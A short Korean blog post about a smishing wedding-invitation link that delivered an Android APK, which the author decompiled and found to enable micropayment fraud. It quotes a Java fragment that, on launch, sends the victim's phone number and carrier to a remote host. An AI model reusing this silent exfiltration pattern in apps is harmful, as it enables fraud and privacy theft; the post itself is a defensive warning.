안드로이드 피싱 앱

SNS로 문자가 왔다.

결혼 축하합니다 축하해주세요 http://짧은 문자.

* 짧은문자는 잠재적 위험을 가지고 있다. (어디로 튈지 모른다)

다음주 결혼하는 모 직원이 있어서 그냥 실행해볼까... 하다가 의심스러웠다. 

그래서 웹으로 접속하니(Mac) .APK 파일이다. 결혼축하를 앱으로 하나보다...(리가 없잖아)

해서 리버싱해서 안의 내용을 본다.

하나의 액티비티가 있고 안에 내용은...

 new Thread(new Runnable(){

      public void run()

      {

        new Tool().postHttpConnection(SMS.conusehost, SMS.ponNum, SMS.towNum, "접속성공.");

      }

    }).start();

액티비티의 실행과 동시에 특정 URL로 내 폰번호와 통신사와 접속했다는 메세지를 보낸다... 뭐 그 다음부터는 안봐도 되겠지...  

역시나 30여분 뒤에 2건의 소액문자 메세지가 왔다.

쉽게 생각하고 클릭하고 설치를 했더라면 30만원날렸겠지... 조심하자.

부모님도 소액결제를 막아야겠다.

내가 겪은 일과 같은 뉴스 기사 : http://www.kado.net/news/articleView.html?idxno=627055